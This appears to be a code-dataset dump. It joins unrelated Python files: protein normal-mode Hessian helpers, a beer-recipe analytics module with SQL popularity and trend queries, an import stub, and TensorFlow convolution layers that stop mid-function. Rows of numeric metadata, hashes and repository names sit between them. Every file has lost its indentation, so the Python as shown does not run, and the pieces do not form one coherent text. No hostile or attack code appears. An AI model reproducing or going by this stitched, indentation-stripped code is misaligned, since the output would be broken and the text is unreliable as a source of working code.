HR[topleftIndex+2][topleftIndex+2] += delta3by3[2][2]
return HR
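# Equivalent, more compact form (sketch, assuming HR is a NumPy array; behaviourally
# identical to the element-wise additions above):
#   HR[topleftIndex:topleftIndex+3, topleftIndex:topleftIndex+3] += delta3by3
# The same slicing pattern applies to add3By3MatrixtoOffDiagonalHessianMatrixIJ below,
# using [topleftIndex:topleftIndex+3, counterpartTopleftIndex:counterpartTopleftIndex+3].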
def add3By3MatrixtoOffDiagonalHessianMatrixIJ(self, delta3by3, offDiagonalHessianMatrix, topleftIndex, counterpartTopleftIndex):
""" Add the delta3by3 matrix to its corresponding position of HR, located by
the topleftIndex. """
offDiagonalHessianMatrix[topleftIndex][counterpartTopleftIndex] += delta3by3[0][0]
offDiagonalHessianMatrix[topleftIndex][counterpartTopleftIndex+1] += delta3by3[0][1]
offDiagonalHessianMatrix[topleftIndex][counterpartTopleftIndex+2] += delta3by3[0][2]
offDiagonalHessianMatrix[topleftIndex+1][counterpartTopleftIndex] += delta3by3[1][0]
offDiagonalHessianMatrix[topleftIndex+1][counterpartTopleftIndex+1] += delta3by3[1][1]
offDiagonalHessianMatrix[topleftIndex+1][counterpartTopleftIndex+2] += delta3by3[1][2]
offDiagonalHessianMatrix[topleftIndex+2][counterpartTopleftIndex] += delta3by3[2][0]
offDiagonalHessianMatrix[topleftIndex+2][counterpartTopleftIndex+1] += delta3by3[2][1]
offDiagonalHessianMatrix[topleftIndex+2][counterpartTopleftIndex+2] += delta3by3[2][2]
return offDiagonalHessianMatrix
def make3By3OffDiagonalHessianTermIJ(self, refChainCalpha, elementcontact, r_ij, r_ij_b):
""" Create a 3 by 3 matrix with the added terms for the hessian super element off the diagnonal (excluding multiplication with gamma). """
x_i = refChainCalpha.getCoords()[0]
y_i = refChainCalpha.getCoords()[1]
z_i = refChainCalpha.getCoords()[2]
x_j = elementcontact.getCoords()[0]
y_j = elementcontact.getCoords()[1]
z_j = elementcontact.getCoords()[2]
deltaTerm = np.zeros((3,3))
deltaTerm[0][0] = self.secondDerivateTermOffDiagonalAtomsIJ(x_i, x_j, x_i, x_j, r_ij, r_ij_b)
deltaTerm[0][1] = self.secondDerivateTermOffDiagonalAtomsIJ(x_i, x_j, y_i, y_j, r_ij, r_ij_b)
deltaTerm[0][2] = self.secondDerivateTermOffDiagonalAtomsIJ(x_i, x_j, z_i, z_j, r_ij, r_ij_b)
deltaTerm[1][0] = deltaTerm[0][1]
deltaTerm[1][1] = self.secondDerivateTermOffDiagonalAtomsIJ(y_i, y_j, y_i, y_j, r_ij, r_ij_b)
deltaTerm[1][2] = self.secondDerivateTermOffDiagonalAtomsIJ(y_i, y_j, z_i, z_j, r_ij, r_ij_b)
deltaTerm[2][0] = deltaTerm[0][2]
deltaTerm[2][1] = deltaTerm[1][2]
deltaTerm[2][2] = self.secondDerivateTermOffDiagonalAtomsIJ(z_i, z_j, z_i, z_j, r_ij, r_ij_b)
return deltaTerm
def getCalphaPosition(self, atom1, reference):
""" Returns the position of atom1 among the calphas of reference. Useful if one
desires to know the index of an calpha atom in the ANM hessian made from reference calphas.
Args:
atom1: the calpha atom that the position is desired to know
reference: the reference structure where the calpha position is obtained from
Returns: Positive integer denoting the calpha position
"""
assert atom1.getName() == 'CA'
referenceCalphas = reference.select('calpha')
# try:
# idx = zip(referenceCalphas).index((atom1, ))
# return idx
# except ValueError:
# print "Exception in getCalphaPosition. This calpha cannot be located in the structure provided. "
for idx, referenceCalpha in enumerate(referenceCalphas):
if atom1 == referenceCalpha:
return idx
raise StopIteration("Exception in getCalphaPosition. This calpha cannot be located in the structure provided. ")
def normalizeM(self, M):
""" Normalize a set of modes, which are the columnvectors in M.
Args:
M: set of modes as columnvectors
Returns: normalized (magnitude of each mode is 1) set of modes as columnvectors in M
"""
Mnormed = None
if M.ndim == 1:
modeVector = Vector(M)
return modeVector.getNormed().getArray()
else:
for element in M.T:
modeVector = Vector(element)
modeNormalized = modeVector.getNormed()
if Mnormed is None:
Mnormed = modeNormalized.getArray()
else:
Mnormed = np.column_stack((Mnormed, modeNormalized.getArray()))
return Mnormed
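# Vectorised alternative (sketch, assuming M is a 2-D NumPy array with the modes as
# columns and no zero-length columns):
#   Mnormed = M / np.linalg.norm(M, axis=0)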
def getNoOfZeroEigvals(self, anm):
""" Return the number of zero eigenvalues, the treshold is defined in the constant ZERO.
Args:
anm: the anm
Returns: number of zero eigenvalues
"""
ZERO = 1e-10
return sum(anm.getEigvals() < ZERO)
def removeInterAtoms(self, arr, interCalphaIndices):
""" Set x,y,z coordinations of atoms indicated by calphasInterIndices to 0,0,0 in arr.
Args:
arr: the array with x,y,z coordinates
interCalphaIndices: calphas with intermolecular contacts
Returns: arr with x,y,z positions of atoms from interCalphaIndices set to 0,0,0
"""
for calphaIndex in interCalphaIndices:
arr[(calphaIndex*3)] = 0.0
arr[(calphaIndex*3+1)] = 0.0
arr[(calphaIndex*3+2)] = 0.0
return arr
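# Vectorised alternative (sketch, assuming arr is a flat NumPy array of x,y,z triples
# and interCalphaIndices is a sequence of integer indices):
#   idx = np.asarray(interCalphaIndices, dtype=int) * 3
#   arr[np.concatenate([idx, idx + 1, idx + 2])] = 0.0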
| 60.751498
| 470
| 0.738643
| 15,135
| 131,770
| 6.281533
| 0.056822
| 0.027169
| 0.026422
| 0.010992
| 0.826172
| 0.79773
| 0.771981
| 0.753763
| 0.73342
| 0.718968
| 0
| 0.010537
| 0.155142
| 131,770
| 2,169
| 471
| 60.751498
| 0.843443
| 0.225066
| 0
| 0.665665
| 0
| 0
| 0.06589
| 0.004404
| 0
| 0
| 0
| 0
| 0.077385
| 0
| null | null | 0.001503
| 0.009767
| null | null | 0.069872
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8f79c1c541ae6bfcae5f65ff145cc66e1b39827
| 24,229
|
py
|
Python
|
recipe_db/analytics/recipe.py
|
scheb/beer-analytics
|
630cfb1dcd409a1b449a54a99aa9b3f73da0f756
|
[
"Beerware"
] | 21
|
2020-09-08T07:05:37.000Z
|
2022-03-25T20:30:47.000Z
|
recipe_db/analytics/recipe.py
|
scheb/beer-analytics
|
630cfb1dcd409a1b449a54a99aa9b3f73da0f756
|
[
"Beerware"
] | 1
|
2022-02-02T02:03:26.000Z
|
2022-02-26T10:18:06.000Z
|
recipe_db/analytics/recipe.py
|
scheb/beer-analytics
|
630cfb1dcd409a1b449a54a99aa9b3f73da0f756
|
[
"Beerware"
] | 4
|
2020-10-10T10:48:07.000Z
|
2022-03-11T13:09:49.000Z
|
import math
from abc import ABC
from typing import Optional, Iterable
import pandas as pd
from django.db import connection
from pandas import DataFrame
from recipe_db.analytics import METRIC_PRECISION, POPULARITY_START_MONTH, POPULARITY_CUT_OFF_DATE
from recipe_db.analytics.scope import RecipeScope, StyleProjection, YeastProjection, HopProjection, \
FermentableProjection
from recipe_db.analytics.utils import remove_outliers, get_style_names_dict, get_hop_names_dict, get_yeast_names_dict, \
get_fermentable_names_dict, RollingAverage, Trending, months_ago
from recipe_db.models import Recipe
class RecipeLevelAnalysis(ABC):
def __init__(self, scope: RecipeScope) -> None:
self.scope = scope
class RecipesListAnalysis(RecipeLevelAnalysis):
def random(self, num_recipes: int) -> Iterable[Recipe]:
scope_filter = self.scope.get_filter()
query = '''
SELECT r.uid AS recipe_id
FROM recipe_db_recipe AS r
WHERE r.name IS NOT NULL {}
ORDER BY random()
LIMIT %s
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters + [num_recipes])
recipe_ids = df['recipe_id'].values.tolist()
if len(recipe_ids) == 0:
return []
return Recipe.objects.filter(uid__in=recipe_ids).order_by('name')
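# Hypothetical usage sketch (the RecipeScope filters depend on the caller):
#   analysis = RecipesListAnalysis(RecipeScope())
#   sample = analysis.random(5)  # up to 5 random Recipe objects matching the scope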
class RecipesCountAnalysis(RecipeLevelAnalysis):
def total(self) -> int:
scope_filter = self.scope.get_filter()
query = '''
SELECT
count(r.uid) AS total_recipes
FROM recipe_db_recipe AS r
WHERE
created IS NOT NULL
{}
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
if len(df) == 0:
return 0
return df['total_recipes'].values.tolist()[0]
def per_day(self) -> DataFrame:
scope_filter = self.scope.get_filter()
query = '''
SELECT
date(r.created) AS day,
count(r.uid) AS total_recipes
FROM recipe_db_recipe AS r
WHERE
created IS NOT NULL
{}
GROUP BY date(r.created)
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
df = df.set_index('day')
return df
def per_month(self) -> DataFrame:
scope_filter = self.scope.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
count(r.uid) AS total_recipes
FROM recipe_db_recipe AS r
WHERE
created IS NOT NULL
{}
GROUP BY date(r.created, 'start of month')
ORDER BY month ASC
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
df = df.set_index('month')
return df
def per_style(self) -> DataFrame:
scope_filter = self.scope.get_filter()
query = '''
SELECT
ras.style_id,
count(DISTINCT r.uid) AS total_recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipe_associated_styles ras
ON r.uid = ras.recipe_id
WHERE
1 {}
GROUP BY ras.style_id
ORDER BY ras.style_id ASC
'''.format(scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
df = df.set_index('style_id')
return df
class RecipesPopularityAnalysis(RecipeLevelAnalysis):
def popularity_per_style(
self,
projection: Optional[StyleProjection] = None,
num_top: Optional[int] = None,
top_months: Optional[int] = None,
) -> DataFrame:
projection = projection or StyleProjection()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
ras.style_id,
count(r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipe_associated_styles AS ras
ON r.uid = ras.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
{}
GROUP BY month, ras.style_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
# Filter top values
top_ids = None
if num_top is not None:
top_scope = per_month
if top_months is not None:
top_scope = top_scope[top_scope['month'] >= months_ago(top_months).strftime('%Y-%m-%d')]
top_ids = top_scope.groupby('style_id')['recipes'].sum().sort_values(ascending=False).index.values[:num_top]
per_month = per_month[per_month['style_id'].isin(top_ids)]
recipes_per_month = RecipesCountAnalysis(self.scope).per_month()
per_month = per_month.merge(recipes_per_month, on="month")
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(per_month, 'style_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Sort by top styles
if top_ids is not None:
smoothened['style_id'] = pd.Categorical(smoothened['style_id'], top_ids)
smoothened = smoothened.sort_values(['style_id', 'month'])
smoothened['beer_style'] = smoothened['style_id'].map(get_style_names_dict())
return smoothened
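# Hypothetical usage sketch: monthly recipe share of the 10 most popular styles,
# ranked by recipe counts from the last 12 months:
#   df = RecipesPopularityAnalysis(RecipeScope()).popularity_per_style(num_top=10, top_months=12)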
def popularity_per_hop(
self,
projection: Optional[HopProjection] = None,
num_top: Optional[int] = None,
top_months: Optional[int] = None,
) -> DataFrame:
projection = projection or HopProjection()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
rh.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipehop AS rh
ON r.uid = rh.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
{}
GROUP BY date(r.created, 'start of month'), rh.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
# Filter top values
top_ids = None
if num_top is not None:
top_scope = per_month
if top_months is not None:
top_scope = top_scope[top_scope['month'] >= months_ago(top_months).strftime('%Y-%m-%d')]
top_ids = top_scope.groupby('kind_id')['recipes'].sum().sort_values(ascending=False).index.values[:num_top]
per_month = per_month[per_month['kind_id'].isin(top_ids)]
recipes_per_month = RecipesCountAnalysis(self.scope).per_month()
per_month = per_month.merge(recipes_per_month, on="month")
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(per_month, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Sort by top kinds
if top_ids is not None:
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], top_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['hop'] = smoothened['kind_id'].map(get_hop_names_dict())
return smoothened
def popularity_per_fermentable(
self,
projection: Optional[FermentableProjection] = None,
num_top: Optional[int] = None,
) -> DataFrame:
projection = projection or FermentableProjection()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
rf.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipefermentable AS rf
ON r.uid = rf.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
{}
GROUP BY date(r.created, 'start of month'), rf.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
# Filter top values
top_ids = None
if num_top is not None:
top_scope = per_month
top_ids = top_scope.groupby('kind_id')['recipes'].sum().sort_values(ascending=False).index.values[:num_top]
per_month = per_month[per_month['kind_id'].isin(top_ids)]
recipes_per_month = RecipesCountAnalysis(self.scope).per_month()
per_month = per_month.merge(recipes_per_month, on="month")
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(per_month, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Sort by top kinds
if top_ids is not None:
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], top_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['fermentable'] = smoothened['kind_id'].map(get_fermentable_names_dict())
return smoothened
def popularity_per_yeast(
self,
projection: Optional[YeastProjection] = None,
num_top: Optional[int] = None,
top_months: Optional[int] = None,
) -> DataFrame:
projection = projection or YeastProjection()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
ry.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipeyeast AS ry
ON r.uid = ry.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
{}
GROUP BY date(r.created, 'start of month'), ry.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
# Filter top values
top_ids = None
if num_top is not None:
top_scope = per_month
if top_months is not None:
top_scope = top_scope[top_scope['month'] >= months_ago(top_months).strftime('%Y-%m-%d')]
top_ids = top_scope.groupby('kind_id')['recipes'].sum().sort_values(ascending=False).index.values[:num_top]
per_month = per_month[per_month['kind_id'].isin(top_ids)]
recipes_per_month = RecipesCountAnalysis(self.scope).per_month()
per_month = per_month.merge(recipes_per_month, on="month")
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(per_month, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Sort by top kinds
if top_ids is not None:
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], top_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['yeast'] = smoothened['kind_id'].map(get_yeast_names_dict())
return smoothened
class RecipesMetricHistogram(RecipeLevelAnalysis):
def metric_histogram(self, metric: str) -> DataFrame:
precision = METRIC_PRECISION[metric] if metric in METRIC_PRECISION else METRIC_PRECISION['default']
scope_filter = self.scope.get_filter()
query = '''
SELECT round({}, {}) as {}
FROM recipe_db_recipe AS r
WHERE
{} IS NOT NULL
{}
'''.format(metric, precision, metric, metric, scope_filter.where)
df = pd.read_sql(query, connection, params=scope_filter.parameters)
df = remove_outliers(df, metric, 0.02)
if len(df) == 0:
return df
# Choose the bin count from the metric's value range: a metric-specific step width,
# clamped to roughly 12-18 bins; the default is 16 bins.
bins = 16
if metric in ['og', 'fg'] and len(df) > 0:
value_range = df[metric].max() - df[metric].min()  # renamed to avoid shadowing the builtin abs()
bins = max([1, round(value_range / 0.002)])
if bins > 18:
bins = round(bins / math.ceil(bins / 12))
if metric in ['abv', 'srm'] and len(df) > 0:
value_range = df[metric].max() - df[metric].min()
bins = max([1, round(value_range / 0.1)])
if bins > 18:
bins = round(bins / math.ceil(bins / 12))
if metric in ['ibu'] and len(df) > 0:
value_range = df[metric].max() - df[metric].min()
bins = max([1, round(value_range)])
if bins > 18:
bins = round(bins / math.ceil(bins / 12))
histogram = df.groupby([pd.cut(df[metric], bins, precision=precision)])[metric].agg(['count'])
histogram = histogram.reset_index()
histogram[metric] = histogram[metric].map(str)
return histogram
class RecipesTrendAnalysis(RecipeLevelAnalysis):
def _recipes_per_month_in_scope(self) -> DataFrame:
return RecipesCountAnalysis(self.scope).per_month()
def trending_styles(self, trend_window_months: int = 24) -> DataFrame:
recipes_per_month = self._recipes_per_month_in_scope()
scope_filter = self.scope.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
ras.style_id,
count(r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipe_associated_styles AS ras
ON r.uid = ras.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
{}
GROUP BY month, ras.style_id
'''.format(scope_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters)
if len(per_month) == 0:
return per_month
per_month = per_month.merge(recipes_per_month, on="month")
per_month['month'] = pd.to_datetime(per_month['month'])
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
trend_filter = Trending(RollingAverage(window=trend_window_months + 1), trending_window=trend_window_months)
trending_ids = trend_filter.get_trending_series(per_month, 'style_id', 'month', 'recipes_percent', 'recipes')
# Filter trending series
trending = per_month[per_month['style_id'].isin(trending_ids)]
if len(trending) == 0:
return trending
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(trending, 'style_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Order by relevance
smoothened['style_id'] = pd.Categorical(smoothened['style_id'], trending_ids)
smoothened = smoothened.sort_values(['style_id', 'month'])
smoothened['beer_style'] = smoothened['style_id'].map(get_style_names_dict())
return smoothened
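# Hypothetical usage sketch: styles trending over the last 12 months within the scope:
#   trending = RecipesTrendAnalysis(RecipeScope()).trending_styles(trend_window_months=12)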
def trending_hops(self, projection: Optional[HopProjection] = None, trend_window_months: int = 24) -> DataFrame:
projection = projection or HopProjection()
recipes_per_month = self._recipes_per_month_in_scope()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
rh.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipehop AS rh
ON r.uid = rh.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
AND rh.kind_id IS NOT NULL
{}
{}
GROUP BY date(r.created, 'start of month'), rh.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
per_month = per_month.merge(recipes_per_month, on="month")
per_month['month'] = pd.to_datetime(per_month['month'])
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
trend_filter = Trending(RollingAverage(window=trend_window_months+1), trending_window=trend_window_months)
trending_ids = trend_filter.get_trending_series(per_month, 'kind_id', 'month', 'recipes_percent', 'recipes')
# Filter trending series
trending = per_month[per_month['kind_id'].isin(trending_ids)]
if len(trending) == 0:
return trending
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(trending, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Order by relevance
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], trending_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['hop'] = smoothened['kind_id'].map(get_hop_names_dict())
return smoothened
def trending_yeasts(self, projection: Optional[YeastProjection] = None, trend_window_months: int = 24) -> DataFrame:
projection = projection or YeastProjection()
recipes_per_month = self._recipes_per_month_in_scope()
scope_filter = self.scope.get_filter()
projection_filter = projection.get_filter()
query = '''
SELECT
date(r.created, 'start of month') AS month,
ry.kind_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipeyeast AS ry
ON r.uid = ry.recipe_id
WHERE
r.created >= %s -- Cut-off date for popularity charts
AND ry.kind_id IS NOT NULL
{}
{}
GROUP BY date(r.created, 'start of month'), ry.kind_id
'''.format(scope_filter.where, projection_filter.where)
per_month = pd.read_sql(query, connection, params=[POPULARITY_CUT_OFF_DATE] + scope_filter.parameters + projection_filter.parameters)
if len(per_month) == 0:
return per_month
per_month = per_month.merge(recipes_per_month, on="month")
per_month['month'] = pd.to_datetime(per_month['month'])
per_month['recipes_percent'] = per_month['recipes'] / per_month['total_recipes']
trend_filter = Trending(RollingAverage(window=trend_window_months+1), trending_window=trend_window_months)
trending_ids = trend_filter.get_trending_series(per_month, 'kind_id', 'month', 'recipes_percent', 'recipes')
# Filter trending series
trending = per_month[per_month['kind_id'].isin(trending_ids)]
if len(trending) == 0:
return trending
# Rolling average
smoothened = RollingAverage().rolling_multiple_series(trending, 'kind_id', 'month')
smoothened['recipes_percent'] = smoothened['recipes_percent'].apply(lambda x: max([x, 0]))
# Start date for popularity charts
smoothened = smoothened[smoothened['month'] >= POPULARITY_START_MONTH]
# Order by relevance
smoothened['kind_id'] = pd.Categorical(smoothened['kind_id'], trending_ids)
smoothened = smoothened.sort_values(['kind_id', 'month'])
smoothened['yeast'] = smoothened['kind_id'].map(get_yeast_names_dict())
return smoothened
class CommonStylesAnalysis(RecipeLevelAnalysis):
def common_styles_absolute(self, num_top: Optional[int] = None) -> DataFrame:
df = self._common_styles_data()
if len(df) == 0:
return df
df = df.sort_values('recipes', ascending=False)
return self._return(df, num_top)
def common_styles_relative(self, num_top: Optional[int] = None) -> DataFrame:
df = self._common_styles_data()
if len(df) == 0:
return df
# Calculate percent
recipes_per_style = RecipesCountAnalysis(RecipeScope()).per_style()
df = df.merge(recipes_per_style, on="style_id")
df['recipes_percent'] = df['recipes'] / df['total_recipes']
df = df.sort_values('recipes_percent', ascending=False)
return self._return(df, num_top)
def _common_styles_data(self) -> DataFrame:
scope_filter = self.scope.get_filter()
query = '''
SELECT
ras.style_id,
count(DISTINCT r.uid) AS recipes
FROM recipe_db_recipe AS r
JOIN recipe_db_recipe_associated_styles AS ras
ON r.uid = ras.recipe_id
WHERE
1 {}
GROUP BY ras.style_id
'''.format(scope_filter.where)
return pd.read_sql(query, connection, params=scope_filter.parameters)
def _return(self, df: DataFrame, num_top: Optional[int]) -> DataFrame:
df['beer_style'] = df['style_id'].map(get_style_names_dict())
if num_top is not None:
df = df[:num_top]
return df
| 41.346416
| 141
| 0.602873
| 2,823
| 24,229
| 4.927382
| 0.063762
| 0.066139
| 0.03271
| 0.028756
| 0.848814
| 0.824587
| 0.817757
| 0.799641
| 0.784975
| 0.781308
| 0
| 0.003747
| 0.29506
| 24,229
| 585
| 142
| 41.417094
| 0.810656
| 0.026043
| 0
| 0.762222
| 0
| 0
| 0.301129
| 0.008698
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042222
| false
| 0
| 0.022222
| 0.002222
| 0.153333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
331a38ef31232051f3a753535ea1e32defc82bec
| 107
|
py
|
Python
|
Tichu-gym/scraper/__ini__.py
|
lukaspestalozzi/Master_Semester_Project
|
4e71d4034ae3f5e7efa0864b48c6fd4d876fef4e
|
[
"MIT"
] | null | null | null |
Tichu-gym/scraper/__ini__.py
|
lukaspestalozzi/Master_Semester_Project
|
4e71d4034ae3f5e7efa0864b48c6fd4d876fef4e
|
[
"MIT"
] | null | null | null |
Tichu-gym/scraper/__ini__.py
|
lukaspestalozzi/Master_Semester_Project
|
4e71d4034ae3f5e7efa0864b48c6fd4d876fef4e
|
[
"MIT"
] | null | null | null |
from .tichumania_game_scraper import GenCombWeights
from .tichumania_game_scraper import TichumaniaScraper
| 35.666667
| 54
| 0.906542
| 12
| 107
| 7.75
| 0.583333
| 0.301075
| 0.387097
| 0.537634
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074766
| 107
| 3
| 54
| 35.666667
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6828319ea4f9fa70a64cc1568049c21ebc548783
| 7,843
|
py
|
Python
|
tflib/layers.py
|
AfricaMachineIntelligence/ConvNetQuake
|
6fea487ce0031d31cc64ad14f9ffc6a0b088a723
|
[
"MIT"
] | 162
|
2017-02-10T20:13:57.000Z
|
2022-03-06T12:50:50.000Z
|
tflib/layers.py
|
VioletaSeo/ConvNetQuake
|
9d8bb6d41e5e3185edf3a3fc716539b910e17cfe
|
[
"MIT"
] | 15
|
2017-05-25T03:58:35.000Z
|
2020-03-12T18:39:10.000Z
|
tflib/layers.py
|
VioletaSeo/ConvNetQuake
|
9d8bb6d41e5e3185edf3a3fc716539b910e17cfe
|
[
"MIT"
] | 108
|
2017-05-25T03:19:51.000Z
|
2022-03-18T02:07:09.000Z
|
import tensorflow as tf
import numpy as np
def conv(inputs,
nfilters,
ksize,
stride=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, ksize, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
strides = [1, stride, stride, 1]
current_layer = tf.nn.conv2d(inputs, weights, strides, padding=padding)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def transpose_conv(inputs,
nfilters,
ksize,
stride=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, ksize, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
bs, h, w, c = inputs.get_shape().as_list()
strides = [1, stride, stride, 1]
out_shape = [bs, stride*h, stride*w, c]
current_layer = tf.nn.conv2d_transpose(inputs, weights, out_shape, strides, padding=padding)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
